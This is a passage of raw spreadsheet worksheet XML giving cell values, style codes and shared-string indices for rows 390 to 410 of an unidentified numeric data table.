      <c r="K390" s="15"/>
      <c r="L390" s="15"/>
      <c r="M390" s="15"/>
      <c r="N390" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O390" s="29">
        <v>1.0</v>
      </c>
      <c r="P390" s="29">
        <v>0.0</v>
      </c>
      <c r="Q390" s="15"/>
      <c r="R390" s="15"/>
      <c r="S390" s="15"/>
      <c r="T390" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U390" s="5"/>
      <c r="V390" s="5"/>
      <c r="W390" s="47"/>
      <c r="X390" s="45"/>
      <c r="Y390" s="45"/>
      <c r="Z390" s="38" t="s">
        <v>2240</v>
      </c>
      <c r="AA390" s="39" t="s">
        <v>2241</v>
      </c>
      <c r="AB390" s="38" t="s">
        <v>2242</v>
      </c>
      <c r="AC390" s="40">
        <v>239045.0</v>
      </c>
      <c r="AD390" s="5"/>
      <c r="AE390" s="14"/>
      <c r="AF390" s="14"/>
    </row>
    <row r="391">
      <c r="A391" s="6">
        <f t="shared" si="1"/>
        <v>0.7884927387</v>
      </c>
      <c r="B391" s="29">
        <v>1.0</v>
      </c>
      <c r="C391" s="14"/>
      <c r="D391" s="14"/>
      <c r="E391" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F391" s="14"/>
      <c r="G391" s="29">
        <v>0.0</v>
      </c>
      <c r="H391" s="29">
        <v>2430.0</v>
      </c>
      <c r="I391" s="29">
        <v>69224.0</v>
      </c>
      <c r="J391" s="15"/>
      <c r="K391" s="29">
        <v>69224.0</v>
      </c>
      <c r="L391" s="15"/>
      <c r="M391" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N391" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O391" s="29">
        <v>3.0</v>
      </c>
      <c r="P391" s="29">
        <v>1.0</v>
      </c>
      <c r="Q391" s="15"/>
      <c r="R391" s="15"/>
      <c r="S391" s="15"/>
      <c r="T391" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U391" s="5"/>
      <c r="V391" s="5"/>
      <c r="W391" s="47"/>
      <c r="X391" s="45"/>
      <c r="Y391" s="45"/>
      <c r="Z391" s="38" t="s">
        <v>2243</v>
      </c>
      <c r="AA391" s="39" t="s">
        <v>2244</v>
      </c>
      <c r="AB391" s="38" t="s">
        <v>488</v>
      </c>
      <c r="AC391" s="40">
        <v>169013.0</v>
      </c>
      <c r="AD391" s="5"/>
      <c r="AE391" s="14"/>
      <c r="AF391" s="14"/>
    </row>
    <row r="392">
      <c r="A392" s="6">
        <f t="shared" si="1"/>
        <v>0.8244761857</v>
      </c>
      <c r="B392" s="29">
        <v>1.0</v>
      </c>
      <c r="C392" s="15"/>
      <c r="D392" s="14"/>
      <c r="E392" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F392" s="14"/>
      <c r="G392" s="29">
        <v>1.0</v>
      </c>
      <c r="H392" s="29">
        <v>398.0</v>
      </c>
      <c r="I392" s="29">
        <v>214396.0</v>
      </c>
      <c r="J392" s="15"/>
      <c r="K392" s="29">
        <v>6253.0</v>
      </c>
      <c r="L392" s="15"/>
      <c r="M392" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N392" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O392" s="29">
        <v>1.0</v>
      </c>
      <c r="P392" s="29">
        <v>0.0</v>
      </c>
      <c r="Q392" s="15"/>
      <c r="R392" s="15"/>
      <c r="S392" s="15"/>
      <c r="T392" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U392" s="5"/>
      <c r="V392" s="5"/>
      <c r="W392" s="45"/>
      <c r="X392" s="45"/>
      <c r="Y392" s="45"/>
      <c r="Z392" s="38" t="s">
        <v>2245</v>
      </c>
      <c r="AA392" s="39" t="s">
        <v>2246</v>
      </c>
      <c r="AB392" s="38" t="s">
        <v>2247</v>
      </c>
      <c r="AC392" s="40">
        <v>215148.0</v>
      </c>
      <c r="AD392" s="5"/>
      <c r="AE392" s="14"/>
      <c r="AF392" s="14"/>
    </row>
    <row r="393">
      <c r="A393" s="6">
        <f t="shared" si="1"/>
        <v>0.5225223634</v>
      </c>
      <c r="B393" s="29">
        <v>1.0</v>
      </c>
      <c r="C393" s="15"/>
      <c r="D393" s="14"/>
      <c r="E393" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F393" s="14"/>
      <c r="G393" s="29">
        <v>1.0</v>
      </c>
      <c r="H393" s="29">
        <v>175.0</v>
      </c>
      <c r="I393" s="29">
        <v>180097.0</v>
      </c>
      <c r="J393" s="15"/>
      <c r="K393" s="29">
        <v>485.0</v>
      </c>
      <c r="L393" s="15"/>
      <c r="M393" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N393" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O393" s="29">
        <v>1.0</v>
      </c>
      <c r="P393" s="29">
        <v>0.0</v>
      </c>
      <c r="Q393" s="15"/>
      <c r="R393" s="15"/>
      <c r="S393" s="15"/>
      <c r="T393" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U393" s="5"/>
      <c r="V393" s="5"/>
      <c r="W393" s="45"/>
      <c r="X393" s="45"/>
      <c r="Y393" s="45"/>
      <c r="Z393" s="38" t="s">
        <v>2248</v>
      </c>
      <c r="AA393" s="39" t="s">
        <v>2249</v>
      </c>
      <c r="AB393" s="38" t="s">
        <v>2250</v>
      </c>
      <c r="AC393" s="40">
        <v>213744.0</v>
      </c>
      <c r="AD393" s="5"/>
      <c r="AE393" s="14"/>
      <c r="AF393" s="14"/>
    </row>
    <row r="394">
      <c r="A394" s="6">
        <f t="shared" si="1"/>
        <v>0.1453399219</v>
      </c>
      <c r="B394" s="29">
        <v>1.0</v>
      </c>
      <c r="C394" s="15"/>
      <c r="D394" s="14"/>
      <c r="E394" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F394" s="14"/>
      <c r="G394" s="29">
        <v>1.0</v>
      </c>
      <c r="H394" s="29">
        <v>1174.0</v>
      </c>
      <c r="I394" s="29">
        <v>249810.0</v>
      </c>
      <c r="J394" s="15"/>
      <c r="K394" s="29">
        <v>6253.0</v>
      </c>
      <c r="L394" s="15"/>
      <c r="M394" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N394" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O394" s="29">
        <v>1.0</v>
      </c>
      <c r="P394" s="29">
        <v>0.0</v>
      </c>
      <c r="Q394" s="15"/>
      <c r="R394" s="15"/>
      <c r="S394" s="15"/>
      <c r="T394" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U394" s="5"/>
      <c r="V394" s="5"/>
      <c r="W394" s="47"/>
      <c r="X394" s="45"/>
      <c r="Y394" s="45"/>
      <c r="Z394" s="38" t="s">
        <v>2251</v>
      </c>
      <c r="AA394" s="39" t="s">
        <v>2252</v>
      </c>
      <c r="AB394" s="38" t="s">
        <v>2253</v>
      </c>
      <c r="AC394" s="40">
        <v>243825.0</v>
      </c>
      <c r="AD394" s="5"/>
      <c r="AE394" s="14"/>
      <c r="AF394" s="14"/>
    </row>
    <row r="395">
      <c r="A395" s="6">
        <f t="shared" si="1"/>
        <v>0.6658789837</v>
      </c>
      <c r="B395" s="29">
        <v>1.0</v>
      </c>
      <c r="C395" s="15"/>
      <c r="D395" s="14"/>
      <c r="E395" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F395" s="14"/>
      <c r="G395" s="29">
        <v>0.0</v>
      </c>
      <c r="H395" s="29">
        <v>1431.0</v>
      </c>
      <c r="I395" s="29">
        <v>116972.0</v>
      </c>
      <c r="J395" s="15"/>
      <c r="K395" s="15"/>
      <c r="L395" s="15"/>
      <c r="M395" s="15"/>
      <c r="N395" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O395" s="29">
        <v>1.0</v>
      </c>
      <c r="P395" s="29">
        <v>2.0</v>
      </c>
      <c r="Q395" s="15"/>
      <c r="R395" s="15"/>
      <c r="S395" s="15"/>
      <c r="T395" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U395" s="5"/>
      <c r="V395" s="5"/>
      <c r="W395" s="47"/>
      <c r="X395" s="45"/>
      <c r="Y395" s="45"/>
      <c r="Z395" s="38" t="s">
        <v>2254</v>
      </c>
      <c r="AA395" s="39" t="s">
        <v>2255</v>
      </c>
      <c r="AB395" s="38" t="s">
        <v>2256</v>
      </c>
      <c r="AC395" s="40">
        <v>129533.0</v>
      </c>
      <c r="AD395" s="5"/>
      <c r="AE395" s="14"/>
      <c r="AF395" s="14"/>
    </row>
    <row r="396">
      <c r="A396" s="6">
        <f t="shared" si="1"/>
        <v>0.8086478594</v>
      </c>
      <c r="B396" s="29">
        <v>1.0</v>
      </c>
      <c r="C396" s="15"/>
      <c r="D396" s="14"/>
      <c r="E396" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F396" s="14"/>
      <c r="G396" s="29">
        <v>1.0</v>
      </c>
      <c r="H396" s="29">
        <v>3037.0</v>
      </c>
      <c r="I396" s="29">
        <v>72027.0</v>
      </c>
      <c r="J396" s="15"/>
      <c r="K396" s="29">
        <v>6253.0</v>
      </c>
      <c r="L396" s="15"/>
      <c r="M396" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N396" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O396" s="29">
        <v>5.0</v>
      </c>
      <c r="P396" s="29">
        <v>0.0</v>
      </c>
      <c r="Q396" s="15"/>
      <c r="R396" s="15"/>
      <c r="S396" s="15"/>
      <c r="T396" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U396" s="5"/>
      <c r="V396" s="5"/>
      <c r="W396" s="47"/>
      <c r="X396" s="45"/>
      <c r="Y396" s="45"/>
      <c r="Z396" s="38" t="s">
        <v>2257</v>
      </c>
      <c r="AA396" s="39" t="s">
        <v>2258</v>
      </c>
      <c r="AB396" s="38" t="s">
        <v>2259</v>
      </c>
      <c r="AC396" s="40">
        <v>140349.0</v>
      </c>
      <c r="AD396" s="5"/>
      <c r="AE396" s="14"/>
      <c r="AF396" s="14"/>
    </row>
    <row r="397">
      <c r="A397" s="6">
        <f t="shared" si="1"/>
        <v>0.6779737782</v>
      </c>
      <c r="B397" s="29">
        <v>1.0</v>
      </c>
      <c r="C397" s="15"/>
      <c r="D397" s="14"/>
      <c r="E397" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F397" s="14"/>
      <c r="G397" s="29">
        <v>1.0</v>
      </c>
      <c r="H397" s="29">
        <v>90.0</v>
      </c>
      <c r="I397" s="29">
        <v>16052.0</v>
      </c>
      <c r="J397" s="15"/>
      <c r="K397" s="29">
        <v>6253.0</v>
      </c>
      <c r="L397" s="15"/>
      <c r="M397" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N397" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O397" s="29">
        <v>2.0</v>
      </c>
      <c r="P397" s="29">
        <v>0.0</v>
      </c>
      <c r="Q397" s="15"/>
      <c r="R397" s="15"/>
      <c r="S397" s="15"/>
      <c r="T397" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U397" s="5"/>
      <c r="V397" s="5"/>
      <c r="W397" s="47"/>
      <c r="X397" s="45"/>
      <c r="Y397" s="45"/>
      <c r="Z397" s="38" t="s">
        <v>2260</v>
      </c>
      <c r="AA397" s="39" t="s">
        <v>2261</v>
      </c>
      <c r="AB397" s="38" t="s">
        <v>2262</v>
      </c>
      <c r="AC397" s="40">
        <v>264255.0</v>
      </c>
      <c r="AD397" s="5"/>
      <c r="AE397" s="14"/>
      <c r="AF397" s="14"/>
    </row>
    <row r="398">
      <c r="A398" s="6">
        <f t="shared" si="1"/>
        <v>0.1595300544</v>
      </c>
      <c r="B398" s="29">
        <v>1.0</v>
      </c>
      <c r="C398" s="15"/>
      <c r="D398" s="14"/>
      <c r="E398" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F398" s="14"/>
      <c r="G398" s="29">
        <v>0.0</v>
      </c>
      <c r="H398" s="29">
        <v>64.0</v>
      </c>
      <c r="I398" s="29">
        <v>161049.0</v>
      </c>
      <c r="J398" s="15"/>
      <c r="K398" s="29">
        <v>161049.0</v>
      </c>
      <c r="L398" s="15"/>
      <c r="M398" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N398" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O398" s="29">
        <v>0.0</v>
      </c>
      <c r="P398" s="29">
        <v>2.0</v>
      </c>
      <c r="Q398" s="15"/>
      <c r="R398" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S398" s="15"/>
      <c r="T398" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U398" s="5"/>
      <c r="V398" s="5"/>
      <c r="W398" s="47"/>
      <c r="X398" s="45"/>
      <c r="Y398" s="45"/>
      <c r="Z398" s="38" t="s">
        <v>2263</v>
      </c>
      <c r="AA398" s="39" t="s">
        <v>2264</v>
      </c>
      <c r="AB398" s="38" t="s">
        <v>1331</v>
      </c>
      <c r="AC398" s="40">
        <v>179373.0</v>
      </c>
      <c r="AD398" s="5"/>
      <c r="AE398" s="14"/>
      <c r="AF398" s="14"/>
    </row>
    <row r="399">
      <c r="A399" s="6">
        <f t="shared" si="1"/>
        <v>0.453555719</v>
      </c>
      <c r="B399" s="29">
        <v>1.0</v>
      </c>
      <c r="C399" s="29">
        <v>19535.0</v>
      </c>
      <c r="D399" s="14"/>
      <c r="E399" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F399" s="14"/>
      <c r="G399" s="29">
        <v>9.0</v>
      </c>
      <c r="H399" s="29">
        <v>11479.0</v>
      </c>
      <c r="I399" s="29">
        <v>1092.0</v>
      </c>
      <c r="J399" s="15"/>
      <c r="K399" s="29">
        <v>-1.0</v>
      </c>
      <c r="L399" s="15"/>
      <c r="M399" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N399" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O399" s="29">
        <v>3.0</v>
      </c>
      <c r="P399" s="29">
        <v>2.0</v>
      </c>
      <c r="Q399" s="15"/>
      <c r="R399" s="15"/>
      <c r="S399" s="15"/>
      <c r="T399" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U399" s="5"/>
      <c r="V399" s="5"/>
      <c r="W399" s="47"/>
      <c r="X399" s="45"/>
      <c r="Y399" s="45"/>
      <c r="Z399" s="38" t="s">
        <v>2265</v>
      </c>
      <c r="AA399" s="39" t="s">
        <v>2266</v>
      </c>
      <c r="AB399" s="38" t="s">
        <v>2267</v>
      </c>
      <c r="AC399" s="40">
        <v>19532.0</v>
      </c>
      <c r="AD399" s="5"/>
      <c r="AE399" s="14"/>
      <c r="AF399" s="14"/>
    </row>
    <row r="400">
      <c r="A400" s="6">
        <f t="shared" si="1"/>
        <v>0.8475580868</v>
      </c>
      <c r="B400" s="29">
        <v>1.0</v>
      </c>
      <c r="C400" s="15"/>
      <c r="D400" s="14"/>
      <c r="E400" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F400" s="14"/>
      <c r="G400" s="29">
        <v>2.0</v>
      </c>
      <c r="H400" s="29">
        <v>1291.0</v>
      </c>
      <c r="I400" s="29">
        <v>72440.0</v>
      </c>
      <c r="J400" s="15"/>
      <c r="K400" s="15"/>
      <c r="L400" s="15"/>
      <c r="M400" s="14"/>
      <c r="N400" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O400" s="29">
        <v>2.0</v>
      </c>
      <c r="P400" s="29">
        <v>2.0</v>
      </c>
      <c r="Q400" s="15"/>
      <c r="R400" s="15"/>
      <c r="S400" s="15"/>
      <c r="T400" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U400" s="5"/>
      <c r="V400" s="5"/>
      <c r="W400" s="47"/>
      <c r="X400" s="45"/>
      <c r="Y400" s="45"/>
      <c r="Z400" s="38" t="s">
        <v>2268</v>
      </c>
      <c r="AA400" s="39" t="s">
        <v>2269</v>
      </c>
      <c r="AB400" s="38" t="s">
        <v>2270</v>
      </c>
      <c r="AC400" s="40">
        <v>86010.0</v>
      </c>
      <c r="AD400" s="5"/>
      <c r="AE400" s="14"/>
      <c r="AF400" s="14"/>
    </row>
    <row r="401">
      <c r="A401" s="6">
        <f t="shared" si="1"/>
        <v>0.7351865327</v>
      </c>
      <c r="B401" s="29">
        <v>1.0</v>
      </c>
      <c r="C401" s="15"/>
      <c r="D401" s="14"/>
      <c r="E401" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F401" s="14"/>
      <c r="G401" s="29">
        <v>5.0</v>
      </c>
      <c r="H401" s="29">
        <v>584.0</v>
      </c>
      <c r="I401" s="29">
        <v>261783.0</v>
      </c>
      <c r="J401" s="15"/>
      <c r="K401" s="29">
        <v>261783.0</v>
      </c>
      <c r="L401" s="15"/>
      <c r="M401" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N401" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O401" s="29">
        <v>1.0</v>
      </c>
      <c r="P401" s="29">
        <v>5.0</v>
      </c>
      <c r="Q401" s="15"/>
      <c r="R401" s="15"/>
      <c r="S401" s="15"/>
      <c r="T401" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U401" s="5"/>
      <c r="V401" s="5"/>
      <c r="W401" s="47"/>
      <c r="X401" s="45"/>
      <c r="Y401" s="45"/>
      <c r="Z401" s="38" t="s">
        <v>2271</v>
      </c>
      <c r="AA401" s="39" t="s">
        <v>2272</v>
      </c>
      <c r="AB401" s="38" t="s">
        <v>2273</v>
      </c>
      <c r="AC401" s="40">
        <v>252657.0</v>
      </c>
      <c r="AD401" s="5"/>
      <c r="AE401" s="14"/>
      <c r="AF401" s="14"/>
    </row>
    <row r="402">
      <c r="A402" s="6">
        <f t="shared" si="1"/>
        <v>0.04716533615</v>
      </c>
      <c r="B402" s="29">
        <v>1.0</v>
      </c>
      <c r="C402" s="29">
        <v>161076.0</v>
      </c>
      <c r="D402" s="14"/>
      <c r="E402" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F402" s="14"/>
      <c r="G402" s="29">
        <v>281.0</v>
      </c>
      <c r="H402" s="29">
        <v>23564.0</v>
      </c>
      <c r="I402" s="29">
        <v>59311.0</v>
      </c>
      <c r="J402" s="15"/>
      <c r="K402" s="29">
        <v>59311.0</v>
      </c>
      <c r="L402" s="15"/>
      <c r="M402" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N402" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O402" s="29">
        <v>3.0</v>
      </c>
      <c r="P402" s="29">
        <v>11.0</v>
      </c>
      <c r="Q402" s="15"/>
      <c r="R402" s="15"/>
      <c r="S402" s="15"/>
      <c r="T402" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U402" s="5"/>
      <c r="V402" s="5"/>
      <c r="W402" s="47"/>
      <c r="X402" s="45"/>
      <c r="Y402" s="45"/>
      <c r="Z402" s="38" t="s">
        <v>2274</v>
      </c>
      <c r="AA402" s="39" t="s">
        <v>2275</v>
      </c>
      <c r="AB402" s="38" t="s">
        <v>2276</v>
      </c>
      <c r="AC402" s="40">
        <v>161071.0</v>
      </c>
      <c r="AD402" s="5"/>
      <c r="AE402" s="14"/>
      <c r="AF402" s="14"/>
    </row>
    <row r="403">
      <c r="A403" s="6">
        <f t="shared" si="1"/>
        <v>0.8670714627</v>
      </c>
      <c r="B403" s="29">
        <v>1.0</v>
      </c>
      <c r="C403" s="14"/>
      <c r="D403" s="14"/>
      <c r="E403" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F403" s="14"/>
      <c r="G403" s="29">
        <v>1.0</v>
      </c>
      <c r="H403" s="29">
        <v>1157.0</v>
      </c>
      <c r="I403" s="29">
        <v>175681.0</v>
      </c>
      <c r="J403" s="15"/>
      <c r="K403" s="15"/>
      <c r="L403" s="15"/>
      <c r="M403" s="15"/>
      <c r="N403" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O403" s="29">
        <v>1.0</v>
      </c>
      <c r="P403" s="29">
        <v>5.0</v>
      </c>
      <c r="Q403" s="15"/>
      <c r="R403" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S403" s="15"/>
      <c r="T403" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U403" s="5"/>
      <c r="V403" s="5"/>
      <c r="W403" s="47"/>
      <c r="X403" s="45"/>
      <c r="Y403" s="45"/>
      <c r="Z403" s="38" t="s">
        <v>2277</v>
      </c>
      <c r="AA403" s="39" t="s">
        <v>2278</v>
      </c>
      <c r="AB403" s="38" t="s">
        <v>2279</v>
      </c>
      <c r="AC403" s="40">
        <v>187901.0</v>
      </c>
      <c r="AD403" s="5"/>
      <c r="AE403" s="14"/>
      <c r="AF403" s="14"/>
    </row>
    <row r="404">
      <c r="A404" s="6">
        <f t="shared" si="1"/>
        <v>0.4850654636</v>
      </c>
      <c r="B404" s="29">
        <v>1.0</v>
      </c>
      <c r="C404" s="14"/>
      <c r="D404" s="14"/>
      <c r="E404" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F404" s="14"/>
      <c r="G404" s="29">
        <v>1.0</v>
      </c>
      <c r="H404" s="29">
        <v>179.0</v>
      </c>
      <c r="I404" s="29">
        <v>241969.0</v>
      </c>
      <c r="J404" s="15"/>
      <c r="K404" s="15"/>
      <c r="L404" s="15"/>
      <c r="M404" s="14"/>
      <c r="N404" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O404" s="29">
        <v>2.0</v>
      </c>
      <c r="P404" s="29">
        <v>0.0</v>
      </c>
      <c r="Q404" s="15"/>
      <c r="R404" s="15"/>
      <c r="S404" s="15"/>
      <c r="T404" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U404" s="5"/>
      <c r="V404" s="5"/>
      <c r="W404" s="47"/>
      <c r="X404" s="45"/>
      <c r="Y404" s="45"/>
      <c r="Z404" s="38" t="s">
        <v>2280</v>
      </c>
      <c r="AA404" s="39" t="s">
        <v>2281</v>
      </c>
      <c r="AB404" s="38" t="s">
        <v>2282</v>
      </c>
      <c r="AC404" s="40">
        <v>237751.0</v>
      </c>
      <c r="AD404" s="5"/>
      <c r="AE404" s="14"/>
      <c r="AF404" s="14"/>
    </row>
    <row r="405">
      <c r="A405" s="6">
        <f t="shared" si="1"/>
        <v>0.0433413863</v>
      </c>
      <c r="B405" s="29">
        <v>1.0</v>
      </c>
      <c r="C405" s="14"/>
      <c r="D405" s="14"/>
      <c r="E405" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F405" s="14"/>
      <c r="G405" s="29">
        <v>0.0</v>
      </c>
      <c r="H405" s="29">
        <v>74.0</v>
      </c>
      <c r="I405" s="29">
        <v>4395.0</v>
      </c>
      <c r="J405" s="15"/>
      <c r="K405" s="15"/>
      <c r="L405" s="15"/>
      <c r="M405" s="15"/>
      <c r="N405" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O405" s="29">
        <v>0.0</v>
      </c>
      <c r="P405" s="29">
        <v>4.0</v>
      </c>
      <c r="Q405" s="15"/>
      <c r="R405" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S405" s="15"/>
      <c r="T405" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U405" s="5"/>
      <c r="V405" s="5"/>
      <c r="W405" s="47"/>
      <c r="X405" s="45"/>
      <c r="Y405" s="45"/>
      <c r="Z405" s="38" t="s">
        <v>2283</v>
      </c>
      <c r="AA405" s="39" t="s">
        <v>2284</v>
      </c>
      <c r="AB405" s="38" t="s">
        <v>395</v>
      </c>
      <c r="AC405" s="40">
        <v>236788.0</v>
      </c>
      <c r="AD405" s="5"/>
      <c r="AE405" s="14"/>
      <c r="AF405" s="14"/>
    </row>
    <row r="406">
      <c r="A406" s="6">
        <f t="shared" si="1"/>
        <v>0.7741337762</v>
      </c>
      <c r="B406" s="29">
        <v>1.0</v>
      </c>
      <c r="C406" s="29">
        <v>241086.0</v>
      </c>
      <c r="D406" s="14"/>
      <c r="E406" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F406" s="14"/>
      <c r="G406" s="29">
        <v>0.0</v>
      </c>
      <c r="H406" s="29">
        <v>181.0</v>
      </c>
      <c r="I406" s="29">
        <v>194759.0</v>
      </c>
      <c r="J406" s="15"/>
      <c r="K406" s="15"/>
      <c r="L406" s="15"/>
      <c r="M406" s="14"/>
      <c r="N406" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O406" s="29">
        <v>1.0</v>
      </c>
      <c r="P406" s="29">
        <v>2.0</v>
      </c>
      <c r="Q406" s="15"/>
      <c r="R406" s="15"/>
      <c r="S406" s="15"/>
      <c r="T406" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U406" s="5"/>
      <c r="V406" s="5"/>
      <c r="W406" s="47"/>
      <c r="X406" s="45"/>
      <c r="Y406" s="45"/>
      <c r="Z406" s="38" t="s">
        <v>2285</v>
      </c>
      <c r="AA406" s="39" t="s">
        <v>2286</v>
      </c>
      <c r="AB406" s="38" t="s">
        <v>2287</v>
      </c>
      <c r="AC406" s="40">
        <v>241019.0</v>
      </c>
      <c r="AD406" s="5"/>
      <c r="AE406" s="14"/>
      <c r="AF406" s="14"/>
    </row>
    <row r="407">
      <c r="A407" s="6">
        <f t="shared" si="1"/>
        <v>0.6230750002</v>
      </c>
      <c r="B407" s="29">
        <v>1.0</v>
      </c>
      <c r="C407" s="14"/>
      <c r="D407" s="14"/>
      <c r="E407" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F407" s="14"/>
      <c r="G407" s="29">
        <v>1.0</v>
      </c>
      <c r="H407" s="29">
        <v>348.0</v>
      </c>
      <c r="I407" s="29">
        <v>167526.0</v>
      </c>
      <c r="J407" s="15"/>
      <c r="K407" s="29">
        <v>6253.0</v>
      </c>
      <c r="L407" s="15"/>
      <c r="M407" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N407" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O407" s="29">
        <v>1.0</v>
      </c>
      <c r="P407" s="29">
        <v>8.0</v>
      </c>
      <c r="Q407" s="15"/>
      <c r="R407" s="15"/>
      <c r="S407" s="15"/>
      <c r="T407" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U407" s="5"/>
      <c r="V407" s="5"/>
      <c r="W407" s="47"/>
      <c r="X407" s="45"/>
      <c r="Y407" s="45"/>
      <c r="Z407" s="38" t="s">
        <v>2288</v>
      </c>
      <c r="AA407" s="39" t="s">
        <v>2289</v>
      </c>
      <c r="AB407" s="38" t="s">
        <v>2290</v>
      </c>
      <c r="AC407" s="40">
        <v>237602.0</v>
      </c>
      <c r="AD407" s="5"/>
      <c r="AE407" s="14"/>
      <c r="AF407" s="14"/>
    </row>
    <row r="408">
      <c r="A408" s="6">
        <f t="shared" si="1"/>
        <v>0.7032740312</v>
      </c>
      <c r="B408" s="29">
        <v>1.0</v>
      </c>
      <c r="C408" s="29">
        <v>103806.0</v>
      </c>
      <c r="D408" s="14"/>
      <c r="E408" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F408" s="14"/>
      <c r="G408" s="29">
        <v>3.0</v>
      </c>
      <c r="H408" s="29">
        <v>104.0</v>
      </c>
      <c r="I408" s="29">
        <v>11679.0</v>
      </c>
      <c r="J408" s="15"/>
      <c r="K408" s="15"/>
      <c r="L408" s="15"/>
      <c r="M408" s="14"/>
      <c r="N408" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O408" s="29">
        <v>3.0</v>
      </c>
      <c r="P408" s="29">
        <v>0.0</v>
      </c>
      <c r="Q408" s="15"/>
      <c r="R408" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S408" s="15"/>
      <c r="T408" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U408" s="5"/>
      <c r="V408" s="5"/>
      <c r="W408" s="47"/>
      <c r="X408" s="45"/>
      <c r="Y408" s="45"/>
      <c r="Z408" s="38" t="s">
        <v>2291</v>
      </c>
      <c r="AA408" s="39" t="s">
        <v>2292</v>
      </c>
      <c r="AB408" s="38" t="s">
        <v>2293</v>
      </c>
      <c r="AC408" s="40">
        <v>103800.0</v>
      </c>
      <c r="AD408" s="5"/>
      <c r="AE408" s="14"/>
      <c r="AF408" s="14"/>
    </row>
    <row r="409">
      <c r="A409" s="6">
        <f t="shared" si="1"/>
        <v>0.9909086444</v>
      </c>
      <c r="B409" s="29">
        <v>1.0</v>
      </c>
      <c r="C409" s="15"/>
      <c r="D409" s="14"/>
      <c r="E409" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F409" s="14"/>
      <c r="G409" s="29">
        <v>2.0</v>
      </c>
      <c r="H409" s="29">
        <v>185.0</v>
      </c>
      <c r="I409" s="29">
        <v>82619.0</v>
      </c>
      <c r="J409" s="15"/>
      <c r="K409" s="29">
        <v>82619.0</v>
      </c>
      <c r="L409" s="15"/>
      <c r="M409" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N409" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O409" s="29">
        <v>3.0</v>
      </c>
      <c r="P409" s="29">
        <v>1.0</v>
      </c>
      <c r="Q409" s="15"/>
      <c r="R409" s="15"/>
      <c r="S409" s="15"/>
      <c r="T409" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U409" s="5"/>
      <c r="V409" s="5"/>
      <c r="W409" s="47"/>
      <c r="X409" s="45"/>
      <c r="Y409" s="45"/>
      <c r="Z409" s="38" t="s">
        <v>2294</v>
      </c>
      <c r="AA409" s="39" t="s">
        <v>2295</v>
      </c>
      <c r="AB409" s="38" t="s">
        <v>1777</v>
      </c>
      <c r="AC409" s="40">
        <v>97215.0</v>
      </c>
      <c r="AD409" s="5"/>
      <c r="AE409" s="14"/>
      <c r="AF409" s="14"/>
    </row>
    <row r="410">
      <c r="A410" s="6">
        <f t="shared" si="1"/>
        <v>0.1125038308</v>
      </c>
      <c r="B410" s="29">
        <v>1.0</v>
      </c>
      <c r="C410" s="14"/>
